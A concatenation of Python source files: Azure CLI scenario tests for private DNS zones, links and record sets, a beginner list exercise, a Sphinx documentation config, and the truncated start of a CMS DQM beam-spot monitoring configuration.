def test_ListZonesInSubscription_MultipleZonesPresent_ExpectMultipleZonesRetrieved(self, resource_group):
expectedZones = self._Create_PrivateZones(numOfZones=2)
returnedZones = self.cmd('az network private-dns zone list', checks=[
self.greater_than('length(@)', 1)
]).get_output_in_json()
self._Validate_Zones(expectedZones, returnedZones)
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_ListZonesInResourceGroup_MultipleZonesPresent_ExpectMultipleZonesRetrieved(self, resource_group):
expectedZones = self._Create_PrivateZones(numOfZones=2)
returnedZones = self.cmd('az network private-dns zone list -g {rg}', checks=[
self.check('length(@)', 2)
]).get_output_in_json()
self._Validate_Zones(expectedZones, returnedZones)
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_ListZonesInResourceGroup_NoZonesPresent_ExpectNoZonesRetrieved(self, resource_group):
self.cmd('az network private-dns zone list -g {rg}', checks=[
self.is_empty()
])
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_DeleteZone_ZoneExists_ExpectZoneDeleted(self, resource_group):
self._Create_PrivateZone()
self.cmd('az network private-dns zone delete -g {rg} -n {zone} -y')
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_DeleteZone_ZoneNotExists_ExpectNoError(self, resource_group):
GeneratePrivateZoneName(self)
self.cmd('az network private-dns zone delete -g {rg} -n {zone} -y')
class PrivateDnsLinksTests(BaseScenarioTests):
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_PutLink_LinkNotExistsWithoutRegistration_ExpectLinkCreated(self, resource_group):
self._Create_VirtualNetworkLink()
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_PutLink_LinkNotExistsWithRegistration_ExpectLinkCreated(self, resource_group):
self._Create_VirtualNetworkLink(registrationEnabled=True)
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_PutLink_LinkExistsIfNoneMatchFailure_ExpectError(self, resource_group):
self._Create_VirtualNetworkLink()
with self.assertRaisesRegexp(CLIError, 'exists already'):
self.cmd('az network private-dns link vnet create -g {rg} -n {link} -z {zone} -v {vnet} -e {registrationEnabled}')
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_PatchLink_LinkExistsIfMatchSuccess_ExpectLinkUpdated(self, resource_group):
linkCreated = self._Create_VirtualNetworkLink()
self.kwargs['etag'] = linkCreated['etag']
cmd = "az network private-dns link vnet update -g {rg} -n {link} -z {zone} --if-match '{etag}'"
self.cmd(cmd, checks=[
self.check('name', '{link}'),
self.check('provisioningState', 'Succeeded')
])
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_PatchLink_LinkExistsIfMatchFailure_ExpectError(self, resource_group):
self._Create_VirtualNetworkLink()
self.kwargs['etag'] = self.create_guid()
cmd = "az network private-dns link vnet update -g {rg} -n {link} -z {zone} --if-match '{etag}'"
with self.assertRaisesRegexp(CloudError, 'etag mismatch'):
self.cmd(cmd)
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_PatchLink_ZoneNotExists_ExpectError(self, resource_group):
GeneratePrivateZoneName(self)
GenerateVirtualNetworkLinkName(self)
with self.assertRaisesRegexp(CloudError, 'ResourceNotFound'):
self.cmd('az network private-dns link vnet update -g {rg} -n {link} -z {zone}')
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_PatchLink_LinkNotExists_ExpectError(self, resource_group):
self._Create_PrivateZone()
GenerateVirtualNetworkLinkName(self)
with self.assertRaisesRegexp(CloudError, 'ResourceNotFound'):
self.cmd('az network private-dns link vnet update -g {rg} -n {link} -z {zone}')
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_PatchLink_LinkExistsEmptyRequest_ExpectNoError(self, resource_group):
self._Create_VirtualNetworkLink()
self.cmd('az network private-dns link vnet update -g {rg} -n {link} -z {zone}', checks=[
self.check('name', '{link}'),
self.check('provisioningState', 'Succeeded')
])
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_PatchLink_EnableRegistration_ExpectRegistrationEnabled(self, resource_group):
self._Create_VirtualNetworkLink()
self.kwargs['registrationEnabled'] = True
self.cmd('az network private-dns link vnet update -g {rg} -n {link} -z {zone} -e {registrationEnabled}', checks=[
self.check('name', '{link}'),
self.check('registrationEnabled', '{registrationEnabled}'),
self.check('provisioningState', 'Succeeded')
])
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_PatchLink_DisableRegistration_ExpectRegistrationDisabled(self, resource_group):
self._Create_VirtualNetworkLink(registrationEnabled=True)
self.kwargs['registrationEnabled'] = False
self.cmd('az network private-dns link vnet update -g {rg} -n {link} -z {zone} -e {registrationEnabled}', checks=[
self.check('name', '{link}'),
self.check('registrationEnabled', '{registrationEnabled}'),
self.check('provisioningState', 'Succeeded')
])
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_PatchLink_LinkExistsAddTags_ExpectTagsAdded(self, resource_group):
self._Create_VirtualNetworkLink()
tagKey, tagVal = GenerateTags(self)
self.cmd('az network private-dns link vnet update -g {rg} -n {link} -z {zone} --tags {tags}', checks=[
self.check('name', '{link}'),
self.check('tags.{}'.format(tagKey), tagVal),
self.check('provisioningState', 'Succeeded')
])
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_PatchLink_LinkExistsChangeTags_ExpectTagsChanged(self, resource_group):
self._Create_VirtualNetworkLink()
tagKey, tagVal = GenerateTags(self)
self.cmd('az network private-dns link vnet update -g {rg} -n {link} -z {zone} --tags {tags}', checks=[
self.check('name', '{link}'),
self.check('tags.{}'.format(tagKey), tagVal),
self.check('provisioningState', 'Succeeded')
])
tagKey, tagVal = GenerateTags(self)
self.cmd('az network private-dns link vnet update -g {rg} -n {link} -z {zone} --tags {tags}', checks=[
self.check('name', '{link}'),
self.check('tags.{}'.format(tagKey), tagVal),
self.check('provisioningState', 'Succeeded')
])
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_PatchLink_LinkExistsRemoveTags_ExpectTagsRemoved(self, resource_group):
self._Create_VirtualNetworkLink()
tagKey, tagVal = GenerateTags(self)
self.cmd('az network private-dns link vnet update -g {rg} -n {link} -z {zone} --tags {tags}', checks=[
self.check('name', '{link}'),
self.check('tags.{}'.format(tagKey), tagVal),
self.check('provisioningState', 'Succeeded')
])
self.cmd('az network private-dns link vnet update -g {rg} -n {link} -z {zone} --tags ""', checks=[
self.check('name', '{link}'),
self.check('tags', '{{}}'),
self.check('provisioningState', 'Succeeded')
])
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_GetLink_ZoneNotExists_ExpectError(self, resource_group):
GeneratePrivateZoneName(self)
GenerateVirtualNetworkLinkName(self)
with self.assertRaisesRegexp(SystemExit, '3'):
self.cmd('az network private-dns link vnet show -g {rg} -n {link} -z {zone}')
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_GetLink_LinkNotExists_ExpectError(self, resource_group):
self._Create_PrivateZone()
GenerateVirtualNetworkLinkName(self)
with self.assertRaisesRegexp(SystemExit, '3'):
self.cmd('az network private-dns link vnet show -g {rg} -n {link} -z {zone}')
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_GetLink_LinkExists_ExpectLinkRetrieved(self, resource_group):
self._Create_VirtualNetworkLink()
self.cmd('az network private-dns link vnet show -g {rg} -n {link} -z {zone}', checks=[
self.check('name', '{link}'),
self.check_pattern('id', GenerateVirtualNetworkLinkArmId(self)),
self.check('provisioningState', 'Succeeded')
])
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_ListLinks_NoLinksPresent_ExpectNoLinksRetrieved(self, resource_group):
self._Create_PrivateZone()
self.cmd('az network private-dns link vnet list -g {rg} -z {zone}', checks=[
self.is_empty()
])
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_ListLinks_MultipleLinksPresent_ExpectMultipleLinksRetrieved(self, resource_group):
expectedLinks = self._Create_VirtualNetworkLinks(numOfLinks=2)
returnedLinks = self.cmd('az network private-dns link vnet list -g {rg} -z {zone}', checks=[
self.check('length(@)', 2)
]).get_output_in_json()
self._Validate_Links(expectedLinks, returnedLinks)
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_DeleteLink_ZoneNotExists_ExpectNoError(self, resource_group):
GeneratePrivateZoneName(self)
GenerateVirtualNetworkLinkName(self)
self.cmd('az network private-dns link vnet delete -g {rg} -n {link} -z {zone} -y')
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_DeleteLink_LinkNotExists_ExpectNoError(self, resource_group):
self._Create_PrivateZone()
GenerateVirtualNetworkLinkName(self)
self.cmd('az network private-dns link vnet delete -g {rg} -n {link} -z {zone} -y')
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_DeleteLink_LinkExists_ExpectLinkDeleted(self, resource_group):
self._Create_VirtualNetworkLink()
self.cmd('az network private-dns link vnet delete -g {rg} -n {link} -z {zone} -y')
class PrivateDnsRecordSetsTests(BaseScenarioTests):
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_PutRecordSet_ZoneNotExists_ExpectError(self, resource_group):
GeneratePrivateZoneName(self)
GenerateRecordSetName(self)
with self.assertRaisesRegexp(CloudError, 'ResourceNotFound'):
self.cmd('az network private-dns record-set a create -g {rg} -n {recordset} -z {zone}')
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_PutRecordSet_IfNoneMatchFailure_ExpectError(self, resource_group):
zone = self._Create_PrivateZone()
self._Create_RecordSet('a', zone['name'])
with self.assertRaisesRegexp(CloudError, 'Precondition Failed'):
self.cmd('az network private-dns record-set {recordType} create -g {rg} -n {recordset} -z {zone}')
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_PatchRecordSet_IfMatchSuccess_ExpectRecordSetUpdated(self, resource_group):
zone = self._Create_PrivateZone()
recordset = self._Create_RecordSet('a', zone['name'])
self._Update_RecordSet(recordset['name'], 'a', zone['name'], recordset['etag'])
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_PatchRecordSet_IfMatchFailure_ExpectError(self, resource_group):
zone = self._Create_PrivateZone()
recordset = self._Create_RecordSet('a', zone['name'])
etag = self.create_guid()
with self.assertRaisesRegexp(CloudError, 'Precondition Failed'):
self._Update_RecordSet(recordset['name'], 'a', zone['name'], etag)
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_GetRecordSet_SoaRecord_ExpectRecordSetRetrieved(self, resource_group):
self._Create_PrivateZone()
self.cmd('az network private-dns record-set soa show -g {rg} -z {zone}', checks=[
self.check('name', '@'),
self.check('type', 'Microsoft.Network/privateDnsZones/SOA'),
self.exists('soaRecord.host'),
self.exists('soaRecord.email'),
self.exists('soaRecord.serialNumber'),
self.exists('soaRecord.refreshTime'),
self.exists('soaRecord.retryTime'),
self.exists('soaRecord.expireTime'),
self.exists('soaRecord.minimumTtl')
])
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_PatchRecordSet_SoaRecord_ExpectRecordSetUpdated(self, resource_group):
self._Create_PrivateZone()
self.kwargs['email'] = 'example.hostmaster.com'
self.kwargs['expireTime'] = 1
self.kwargs['minimumTtl'] = 2
self.kwargs['retryTime'] = 3
self.kwargs['refreshTime'] = 4
self.kwargs['serialNumber'] = 5
self.cmd('az network private-dns record-set soa update -g {rg} -z {zone} \
-e {email} -x {expireTime} -m {minimumTtl} -f {refreshTime} -r {retryTime} -s {serialNumber}', checks=[
self.check('name', '@'),
self.check('type', 'Microsoft.Network/privateDnsZones/SOA'),
self.check('soaRecord.email', '{email}'),
self.check('soaRecord.refreshTime', '{refreshTime}'),
self.check('soaRecord.retryTime', '{retryTime}'),
self.check('soaRecord.expireTime', '{expireTime}'),
self.check('soaRecord.minimumTtl', '{minimumTtl}')
])
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_PatchRecordSet_AddMetadata_ExpectMetadataAdded(self, resource_group):
zone = self._Create_PrivateZone()
self._Create_RecordSet('a', zone['name'])
tagKey, tagVal = GenerateTags(self)
self.cmd('az network private-dns record-set a update -g {rg} -n {recordset} -z {zone} --metadata {tags}', checks=[
self.check('name', '{recordset}'),
self.check('metadata.{}'.format(tagKey), tagVal)
])
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_PatchRecordSet_ChangeMetadata_ExpectMetadataChanged(self, resource_group):
zone = self._Create_PrivateZone()
self._Create_RecordSet('a', zone['name'])
tagKey, tagVal = GenerateTags(self)
self.cmd('az network private-dns record-set a update -g {rg} -n {recordset} -z {zone} --metadata {tags}', checks=[
self.check('name', '{recordset}'),
self.check('metadata.{}'.format(tagKey), tagVal)
])
tagKey, tagVal = GenerateTags(self)
self.cmd('az network private-dns record-set a update -g {rg} -n {recordset} -z {zone} --metadata {tags}', checks=[
self.check('name', '{recordset}'),
self.check('metadata.{}'.format(tagKey), tagVal)
])
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_PatchRecordSet_RemoveMetadata_ExpectMetadataRemoved(self, resource_group):
zone = self._Create_PrivateZone()
self._Create_RecordSet('a', zone['name'])
tagKey, tagVal = GenerateTags(self)
self.cmd('az network private-dns record-set a update -g {rg} -n {recordset} -z {zone} --metadata {tags}', checks=[
self.check('name', '{recordset}'),
self.check('metadata.{}'.format(tagKey), tagVal)
])
self.cmd('az network private-dns record-set a update -g {rg} -n {recordset} -z {zone} --metadata ""', checks=[
self.check('name', '{recordset}'),
self.check('metadata', '{{}}')
])
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_CrudRecordSet_ARecord_ExpectCrudSuccessful(self, resource_group):
zone = self._Create_PrivateZone()
recordset = self._Create_RecordSet('a', zone['name'])
recordset = self._Update_RecordSet(recordset['name'], 'a', zone['name'])
recordset = self._Create_ARecord(recordset['name'], zone['name'], '10.0.0.4')
recordsetResult = self._Show_RecordSet(recordset['name'], 'a', zone['name'])
self.assertTrue(all(record in recordsetResult.get('aRecords') for record in recordset.get('aRecords')))
recordset = self._Delete_ARecord(recordset['name'], zone['name'], '10.0.0.4')
self._Delete_RecordSet(recordset['name'], 'a', zone['name'])
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_CrudRecordSet_AAAARecord_ExpectCrudSuccessful(self, resource_group):
zone = self._Create_PrivateZone()
recordset = self._Create_RecordSet('aaaa', zone['name'])
recordset = self._Update_RecordSet(recordset['name'], 'aaaa', zone['name'])
recordset = self._Create_AAAARecord(recordset['name'], zone['name'], '2001::1')
recordsetResult = self._Show_RecordSet(recordset['name'], 'aaaa', zone['name'])
self.assertTrue(all(record in recordsetResult.get('aaaaRecords') for record in recordset.get('aaaaRecords')))
recordset = self._Delete_AAAARecord(recordset['name'], zone['name'], '2001::1')
self._Delete_RecordSet(recordset['name'], 'aaaa', zone['name'])
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_CrudRecordSet_MXRecord_ExpectCrudSuccessful(self, resource_group):
zone = self._Create_PrivateZone()
recordset = self._Create_RecordSet('mx', zone['name'])
recordset = self._Update_RecordSet(recordset['name'], 'mx', zone['name'])
recordset = self._Create_MXRecord(recordset['name'], zone['name'], 'ex.change.new', preference=2)
recordsetResult = self._Show_RecordSet(recordset['name'], 'mx', zone['name'])
self.assertTrue(all(record in recordsetResult.get('mxRecords') for record in recordset.get('mxRecords')))
recordset = self._Delete_MXRecord(recordset['name'], zone['name'], 'ex.change.new', preference=2)
self._Delete_RecordSet(recordset['name'], 'mx', zone['name'])
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_CrudRecordSet_PTRRecord_ExpectCrudSuccessful(self, resource_group):
zone = self._Create_PrivateZone()
recordset = self._Create_RecordSet('ptr', zone['name'])
recordset = self._Update_RecordSet(recordset['name'], 'ptr', zone['name'])
recordset = self._Create_PTRRecord(recordset['name'], zone['name'], 'ptrd.name.new')
recordsetResult = self._Show_RecordSet(recordset['name'], 'ptr', zone['name'])
self.assertTrue(all(record in recordsetResult.get('ptrRecords') for record in recordset.get('ptrRecords')))
recordset = self._Delete_PTRRecord(recordset['name'], zone['name'], 'ptrd.name.new')
self._Delete_RecordSet(recordset['name'], 'ptr', zone['name'])
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_CrudRecordSet_TXTRecord_ExpectCrudSuccessful(self, resource_group):
zone = self._Create_PrivateZone()
recordset = self._Create_RecordSet('txt', zone['name'])
recordset = self._Update_RecordSet(recordset['name'], 'txt', zone['name'])
recordset = self._Create_TXTRecord(recordset['name'], zone['name'], 'new txt record')
recordsetResult = self._Show_RecordSet(recordset['name'], 'txt', zone['name'])
self.assertTrue(all(record in recordsetResult.get('txtRecords') for record in recordset.get('txtRecords')))
recordset = self._Delete_TXTRecord(recordset['name'], zone['name'], 'new txt record')
self._Delete_RecordSet(recordset['name'], 'txt', zone['name'])
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_CrudRecordSet_CNAMERecord_ExpectCrudSuccessful(self, resource_group):
zone = self._Create_PrivateZone()
recordset = self._Create_RecordSet('cname', zone['name'])
recordset = self._Update_RecordSet(recordset['name'], 'cname', zone['name'])
recordset = self._Create_CNAMERecord(recordset['name'], zone['name'], 'newclitestcname')
recordsetResult = self._Show_RecordSet(recordset['name'], 'cname', zone['name'])
self.assertTrue(recordsetResult.get('cnameRecord') == recordset.get('cnameRecord'))
recordset = self._Delete_CNAMERecord(recordset['name'], zone['name'], 'newclitestcname')
self._Delete_RecordSet(recordset['name'], 'cname', zone['name'])
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_CrudRecordSet_SRVRecord_ExpectCrudSuccessful(self, resource_group):
zone = self._Create_PrivateZone()
recordset = self._Create_RecordSet('srv', zone['name'])
recordset = self._Update_RecordSet(recordset['name'], 'srv', zone['name'])
recordset = self._Create_SRVRecord(recordset['name'], zone['name'], 'newsrv.target')
recordsetResult = self._Show_RecordSet(recordset['name'], 'srv', zone['name'])
self.assertTrue(all(record in recordsetResult.get('srvRecords') for record in recordset.get('srvRecords')))
recordset = self._Delete_SRVRecord(recordset['name'], zone['name'], 'newsrv.target')
self._Delete_RecordSet(recordset['name'], 'srv', zone['name'])
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_ListRecordSetsByType_NoRecordSetsPresent_ExpectNoRecordSetsRetrieved(self, resource_group):
self._Create_PrivateZone()
self.cmd('az network private-dns record-set a list -g {rg} -z {zone}', checks=[
self.is_empty()
])
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_ListRecordSetsByType_MultipleRecordSetsPresent_ExpectMultipleRecordSetsRetrieved(self, resource_group):
zone = self._Create_PrivateZone()
recordset1 = self._Create_RecordSet('a', zone['name'])
recordset2 = self._Create_RecordSet('a', zone['name'])
recordset3 = self._Create_RecordSet('a', zone['name'])
recordset4 = self._Create_RecordSet('a', zone['name'])
createdRecordsets = [recordset1, recordset2, recordset3, recordset4]
returnedRecordsets = self.cmd('az network private-dns record-set a list -g {rg} -z {zone}', checks=[
self.check('length(@)', 4)
]).get_output_in_json()
self.assertTrue(all(recordset in createdRecordsets for recordset in returnedRecordsets))
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_ListRecordSetsAcrossType_DefaultRecordSetPresent_ExpectDefaultRecordSetRetrieved(self, resource_group):
self._Create_PrivateZone()
self.cmd('az network private-dns record-set list -g {rg} -z {zone}', checks=[
self.check('length(@)', 1),
self.exists('@[0].soaRecord'),
self.check('@[0].name', '@')
])
@ResourceGroupPreparer(name_prefix='clitest_privatedns')
def test_ListRecordSetsAcrossType_MultipleRecordSetsPresent_ExpectMultipleRecordSetsRetrieved(self, resource_group):
zone = self._Create_PrivateZone()
recordset1 = self._Create_RecordSet('a', zone['name'])
recordset2 = self._Create_RecordSet('aaaa', zone['name'])
recordset3 = self._Create_RecordSet('txt', zone['name'])
recordset4 = self._Create_RecordSet('cname', zone['name'])
recordset5 = self._Create_RecordSet('srv', zone['name'])
recordset6 = self._Create_RecordSet('mx', zone['name'])
recordset7 = self._Create_RecordSet('ptr', zone['name'])
soaRecordset = self.cmd('az network private-dns record-set soa show -g {rg} -z {zone}').get_output_in_json()
createdRecordsets = [recordset1, recordset2, recordset3, recordset4, recordset5, recordset6, recordset7, soaRecordset]
returnedRecordsets = self.cmd('az network private-dns record-set list -g {rg} -z {zone}', checks=[
self.check('length(@)', 8)
]).get_output_in_json()
self.assertTrue(all(recordset in createdRecordsets for recordset in returnedRecordsets))
if __name__ == '__main__':
unittest.main()
|
py | 7dfaaf51f0aef7da9eaece3be133c36286b53b78 | #a)sort the list in both ascending and descending order.
print("a")
cars = [32,43,42,42,56,75,23]
cars.sort()
print(cars)
cars.sort(reverse=True)
print(cars)
print("b")
#b)create a 1 dimensional list and fetch all items from the list.
plist=['sank','ram','shikha','ashu']
print(plist)
print("c")
#c) Write a program to remove duplicates from the list.
fruit_random=['Apple','Banana','Apple','Banana','Orange','Banana','Banana','Orange','Apple','Banana','Orange']
print(f"\n\nList before removing duplicates: {fruit_random}")
fruit_distinct = list(set(fruit_random))
print(f"List after removing duplicates: {fruit_distinct}")
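# Aside (not part of the original exercise): an order-preserving alternative,
# assuming Python 3.7+, where dict preserves insertion order.
fruit_ordered = list(dict.fromkeys(fruit_random))
print(f"Order-preserving variant: {fruit_ordered}")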
print("d")
#d)Print below using For loop
#XXX
#XXXXXX
Pat = ["XXX", "XXXXXX"]
for X in Pat:
print(X)
print("e")
#e
names=['sank','SANK','ASHU','ashu']
names.sort()
print(names)
print("f")
#f
word=['zero','one','two','three','four','five','six','seven','eight','nine']
number = input("Enter number: ")
# iterate over the digits directly; reversing the value as an integer drops zeros
for digit in number:
    print(word[int(digit)], end=" ")
print()
print("g")
#g
mylist=['sank','ashu','shashank','sank']
mylist.append('sssss')
print(mylist)
mylist.extend(names)
print(mylist)
mylist.pop()
print(mylist)
print("h")
#h) Remove certain items from the list by using pop and remove
thislist = ["apple", "banana", "cherry"]
thislist.remove('apple')
print(thislist)
thislist.pop()
print(thislist)
print("i")
# i)Replace a particular element in the list.
my_list = ['Banana','Banana','Apple','Mango','Banana','Mango','Mango','Apple']
print(my_list)
my_list = ['Pear' if i=='Banana' else i for i in my_list]
print(my_list)
print("j")
#j)Empty out the list
mylist.clear()
print(mylist)
print("k")
#k)Delete the list
del mylist
|
py | 7dfaaf6c48c602960ef6e5d7d5b301ba94149adf | # -*- coding: utf-8 -*-
#
# EmotionX documentation build configuration file, created by
# sphinx-quickstart.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import os
import sys
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'EmotionX'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
# language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
# html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
# html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
# html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additional_pages = {}
# If false, no module index is generated.
# html_domain_indices = True
# If false, no index is generated.
# html_use_index = True
# If true, the index is split into individual pages for each letter.
# html_split_index = False
# If true, links to the reST sources are added to the pages.
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'emotionxdoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
# 'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index',
'emotionx.tex',
u'EmotionX Documentation',
u"Andrew Nguyen", 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False
# If true, show page references after internal links.
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
# latex_appendices = []
# If false, no module index is generated.
# latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'emotionx', u'EmotionX Documentation',
[u"Andrew Nguyen"], 1)
]
# If true, show URL addresses after external links.
# man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'emotionx', u'EmotionX Documentation',
u"Andrew Nguyen", 'EmotionX',
'Repo for EmotionX comp', 'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
# texinfo_appendices = []
# If false, no module index is generated.
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
# texinfo_show_urls = 'footnote'
|
py | 7dfab01fde1bca8721d6898a3c5f0c6bad050b64 | from __future__ import print_function
import FWCore.ParameterSet.Config as cms
# Define once the BeamSpotOnline record name,
# will be used both in BeamMonitor setup and in payload creation/upload
BSOnlineRecordName = 'BeamSpotOnlineHLTObjectsRcd'
BSOnlineTag = 'BeamSpotOnlineTestHLT'
BSOnlineJobName = 'BeamSpotOnlineTestHLT'
BSOnlineOmsServiceUrl = 'http://cmsoms-services.cms:9949/urn:xdaq-application:lid=100/getRunAndLumiSection'
useLockRecords = True
#from Configuration.Eras.Era_Run2_2018_cff import Run2_2018
#process = cms.Process("BeamMonitor", Run2_2018) # FIMXE
import sys
from Configuration.Eras.Era_Run2_2018_pp_on_AA_cff import Run2_2018_pp_on_AA
process = cms.Process("BeamMonitor", Run2_2018_pp_on_AA)
# Configure tag and jobName if running Playback system
if "dqm_cmssw/playback" in str(sys.argv[1]):
BSOnlineTag = BSOnlineTag + 'Playback'
BSOnlineJobName = BSOnlineJobName + 'Playback'
BSOnlineOmsServiceUrl = ''
useLockRecords = False
# Message logger
#process.load("FWCore.MessageLogger.MessageLogger_cfi")
#process.MessageLogger = cms.Service("MessageLogger",
# debugModules = cms.untracked.vstring('*'),
# cerr = cms.untracked.PSet(
# FwkReport = cms.untracked.PSet(
# optionalPSet = cms.untracked.bool(True),
# reportEvery = cms.untracked.int32(1000),
# limit = cms.untracked.int32(999999)
# )
# ),
# destinations = cms.untracked.vstring('cerr'),
#)
# switch
live = True # FIXME
unitTest = False
if 'unitTest=True' in sys.argv:
live=False
unitTest=True
useLockRecords = False
# Common part for PP and H.I Running
#-----------------------------
if unitTest:
process.load("DQM.Integration.config.unittestinputsource_cfi")
from DQM.Integration.config.unittestinputsource_cfi import options
elif live:
# for live online DQM in P5
process.load("DQM.Integration.config.inputsource_cfi")
from DQM.Integration.config.inputsource_cfi import options
# new stream label
process.source.streamLabel = cms.untracked.string('streamDQMOnlineBeamspot')
else:
process.load("DQM.Integration.config.fileinputsource_cfi")
from DQM.Integration.config.fileinputsource_cfi import options
# for testing in lxplus
#process.load("DQM.Integration.config.fileinputsource_cfi")
